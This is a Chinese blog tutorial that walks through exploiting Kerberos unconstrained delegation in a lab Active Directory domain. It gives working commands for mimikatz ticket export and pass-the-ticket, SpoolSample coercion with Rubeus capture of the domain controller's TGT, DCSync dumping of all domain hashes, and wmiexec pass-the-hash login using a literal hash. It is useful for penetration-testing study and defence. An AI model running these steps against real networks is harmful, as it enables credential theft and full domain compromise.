非约束委派利用

置顶 已于 2023-03-26 00:44:40 修改
阅读量319 收藏 2
点赞数
分类专栏: 域安全 文章标签: 信息安全 安全漏洞 网络安全 网络 安全
于 2023-02-21 18:27:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129129046
版权
文章介绍了非约束性委派的概念,这是一种网络权限配置,但也带来安全隐患。攻击者可能利用非约束委派结合其他漏洞进行提权。文中详细阐述了配置过程,包括利用诱导域管访问和SpoolSample打印机漏洞进行DCSync的方法,并展示了利用mimikatz工具进行票据操作和权限提升的步骤。
摘要由CSDN通过智能技术生成

文章目录

什么是非约束性委派
委派是大型网络中经常部署的应用模式,给多跳认证带来了很大的便利,
与此同时也带来了很大的安全隐患。利用委派,攻击者可结合其他漏洞
进行组合攻击,导致攻击者获取本地管理员甚至域管理员权限,还可以
制作深度隐藏的后门。委派是指将域内用户的权限委派给服务账户,使
得服务账户能以用户权限访问域内其他服务。
配置非约束委派
环境说明:
192.168.126.66 域控
192.168.126.50 (Windows10Sql$)配置了机器账号的非约束委派机器
配置:

在这里插入图片描述

利用非约束委派简述
这里先简单讲解下:
委派其实可以看做是存款人、银行、定期存单这上面三者的关系,
存款人将钱存入银行,然后委托银行为你办理3年的存单。
存款人是用户
银行是委派的机器账号
存单是你要访问的服务
这里要注意的是委派可以使机器账号配置也可以是域内用户账号配置的SPN,
SQL Server 在安装时会在域内自动注册服务账户 SQLServiceAceount,
也可将域用户通过注册 SPN变为服务账户。
非约束性委派(Unconstrained Delegation):服务账号可以请求得到域内用户的TGT,服务账号使用该
TGT模拟域内用户访问任意服务。被配置为非约束委托的系统将把TGT(Ticket Granting Ticket)存
储到LSASS内存中,以便使用户能够访问终端资源。非约束委派的设置需要SeEnableDelegation权
限,一般为管理员具有此权限。
流程:
1.域内用户A经过Kerberos认证后访问WEB服务器
2.WEB服务器以服务账户B向KDC请求用户A的可转发票据TGT
3.KDC检查B的委派属性,下发TGT
4.服务账户B使用TGT向KDC申请服务票据TGS(访问文件服务器等功能)
5.KDC检查委派属性和申请的服务,下发TGS
6.服务账户使用TGS访问其他服务
查询域内的非约束委派
bloodhound查询:

在这里插入图片描述

Adfind查询:
查询域中配置非约束委派的主机
AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
查询域中配置非约束委派的服务账户

在这里插入图片描述

方式一.诱导域管访问的非约束委派利用
192.168.126.50 Windows10Sql$机器账号配置了非约束委派,
Windows10Sql$机器开启共享,之后使用DC域管账号访问,
Windows10Sql共享即可拿到域管TGT票据。

在这里插入图片描述
在这里插入图片描述

使用mimikatz导出administrator域管票据:
	privilege::debug
	sekurlsa::tickets /export

在这里插入图片描述

生成以下票据文件:

在这里插入图片描述

导入票据:
kerberos::ptt C:\Users\admin\Desktop\123\[0;1559d7]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi

在这里插入图片描述

查看票据:
kerberos::list

在这里插入图片描述

在这里插入图片描述

方式二.使用SpoolSample打印机漏洞+Rubeus获取域控机器账号进行DCSync
	需要注意:必须当前控制的机器是域内账号就算是本地管理员账号也无法触发,
	且Rubeus.exe需要管理员身份运行,以为这域内账号必须在本地管理员组才行,
	如果之前没有配置该机器账号的委派是无法拿到域控机器账号的TGT的,如果
	马上更改为非约束委派也是不行的需要重启域控才行。
	
SpoolSample可以强制指定机器账号访问本机机器,Rubeus开启监听获得目标域控机器账号TGT票据进行DCSync。
准备:
	https://github.com/leechristensen/SpoolSample(不需要管理员)
	https://github.com/GhostPack/Rubeus			 (需要管理员)
Rubeus开启监听:
	Rubeus.exe monitor /interval:2 /filteruser:XXXX$(域控机器账号可以通过bloodhound或者Adfind等查询找到)
SpoolSample打印机漏洞利用:	
	SpoolSample.exe DC2008(域控机器名) WIN10(Rubeus监听机器名)

在这里插入图片描述

Rubeus监听到域控机器账号TGT(域控机器账号具有DCSync权限):
	导入票据:
	Rubeus.exe ptt /ticket:Rubeus base64 TGT内容

在这里插入图片描述
在这里插入图片描述

mimikatz Dcsync导出域内所有用户hash:
	privilege::debug
	lsadump::dcsync /domain:test.com /all /csv

在这里插入图片描述

利用提权
方式1

在这里插入图片描述

方式2
进行dcsync:
lsadump::dcsync /domain:test.com /all /csv

在这里插入图片描述

使用wmiexec登录域控
命令:wmiexec.exe -hashes :443304af5a35f12b9ff7ecc74adc5a27 administrator@192.168.126.66

在这里插入图片描述

虚构之人
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SpoolSample-master_Spooler_TheOther_
09-28
SpoolSamplePoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.
【域权限维持】-约束委派&约束委派
qq_41617902的博客
02-14 488
域的约束委派&约束委派利用
Kerberos-约束性委派攻击
m0_75218183的博客
06-07 419
概念: 服务账号可以获取被委派用户的TGT,并将TGT缓存到lsass进程中,从而服务账号可使用该TGT,模拟该用户访问域内其他服务。约束委派的设置需要SeEnableDelegationPrivilege权限,该特权通常只有域管理员才有。
域控-笔记三(约束委派攻击,约束委派攻击)
5L2g556F5ZWl77yf
11-25 2799
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 约束委派攻击本地环境约束委派的查找 一. 域委派 1.1 域委派分类 约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
内网安全约束委派 约束委派 资源约束委派
qq_61553520的博客
01-28 1652
实验靶场:redteam.red。
rubeus+spoolsample.zip域渗透约束性委派攻击实验
08-19
约束性委派攻击中,攻击者可能会利用Rubeus获取的权限,将SpoolSample或其他恶意代码注入到打印机队列中,从而在目标系统上执行代码。 为了防止这类攻击,管理员应该遵循以下最佳实践: 1. 禁用不必要的服务,...
AD域内委派后门详解-1
06-19
本文将详细介绍三种类型的域委派,以及攻击者如何利用这些委派进行约束委派攻击、约束委派攻击和基于资源的约束委派攻击。 1. **约束委派攻击** 约束委派允许服务账号在任何地方代表用户进行身份验证,而不...
hw面试题,网络安全服务面试题,78页,近三万字,纯手工总结
最新发布
06-27
- **约束委派/约束委派/基于资源的约束委派**: 通过不同的委派类型进行攻击。 以上知识点涵盖了内网渗透的基础方法和技术细节,以及Kerberos认证机制及其潜在的安全威胁,对于理解网络安全领域中的实战技能具有...
突破企业网络新边界-身份认证协议攻防.pdf
07-02
Kerberos协议的攻击方式包括Kerberos密码喷洒、密码爆破、AS-Reproasting、Kerberoasting、黄金票据、白银票据约束约束委派攻击、基于资源的约束委派攻击、青铜比特攻击等。这些攻击方式可以让攻击者获得身份...
某亭红队面试.pdf
07-02
在本文中,我们还讨论了域内攻击方法,包括 MS14-068、Roasting 攻击、离线爆破密码、委派攻击、约束性委派、基于资源的约束委派、ntlm relay 等知识点这些知识点都是攻击 Java_web 程序中常见的攻击方式。...
NetNTLMtoSilverTicket:SpoolSample->响应程序wNetNTLM降级-> NetNTLMv1-> NTLM-> Kerberos银牌
05-05
SpoolSample-> NetNTLMv1-> NTLM->银票 该技术已被其他人提及,但我还没有看到有什么凝聚力。 下面,我们将逐步完成获取NetNTLMv1质询/响应身份验证,将其破解为NTLM哈希以及使用该NTLM哈希来签署Kerberos Silver票证的步骤。 这将在“ LAN Manager身份验证级别”设置为2或更小的网络上工作。 在较旧的较大Windows部署中,这是相当普遍的情况。 它不适用于Windows 10 / Server 2016或更高版本。 有3个主要步骤 获取机器帐户与@tifkin_(李·克里斯滕森)的SpoolSample对应的NetNTLMv1响应 使用@ 0x31337的(David Hulton)的Rainbow Tables将NetNTLMv1响应破解回NTLM哈希 使用@ agsolino's(Albert Solino's)ticke
约束委派攻击
qq_45462249的博客
07-24 631
约束委派攻击
Kerberos 域委派攻击之约束性委派
Adminxe的博客
03-06 864
CSDN文章自动迁移自博客在Windows 2000 Server 首次发布 Active Directory 时,Microsoft 必须提供一种简单的机制来支持用户通过 Kerberos 向 Web Server 进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为“Kerberos 双跳问题”,并且要求进行委派,以便 Web Server 在修改数据库记录时模拟用户。Windows 2000 Server 发布的也是最初的约束性委派。需要注意的一点是接受委派的用户只能是。
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2663
域渗透约束委派利用
域渗透之约束委派
qq_56426046的博客
11-12 760
一个域内普通用户jack通过Kerberos协议认证到前台WEB服务后,前台运行 WEB服务的服务账号websvc模拟(Impersonate)用户 jack,以Kerberos 协议继续认证到后台服务器,从而在后台服务器中获取jack用户的访问权限,即域中单跳或者多跳的Kerberos认证。KDC检查websvc的委派属性,如果被设置,且申请的文件服务在允许的列表清单中,则返回一个jack用户访问文件服务的授权票据 ST;websvc收到的jack用户的授权票据ST后,可访问文件服务,完成多跳认证。
约束委派攻击原理与利用
good good study
04-07 5174
在实际情况中,往往多个服务不可能都在一台机器中,那么如果用户在使用服务A时,又需要用到服务B上的数据,那么最简单的方式就是A代替用户去请求B并返回相应的数据,这个过程就是委派。即 委派=我帮你去做什么事委派攻击分为约束委派约束委派、基于资源的约束委派三种。
推荐开源项目:SpoolSample - 利用MS-RPRN协议的认证利用工具
gitblog_00036的博客
05-17 457
推荐开源项目:SpoolSample - 利用MS-RPRN协议的认证利用工具 SpoolSamplePoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.项目地址:ht...
域渗透-委派攻击
m0_58596609的博客
11-15 1489
委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取域管理员权限,甚至制作深度隐藏的后门。 一:域委派 简单明了:委派就是将域内用户的权限委派给服务账号,使得服务账号能以用户权限访问域内其他服务。将我的权限给服务账户。 1.1:委派流程 User(laosec\jack)--访问-->Websrv(以User身份)--访问-->Service(文件服务器) 需求:jack需要登陆到后台文件服务器,经过Kerberos认证的过程如下
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值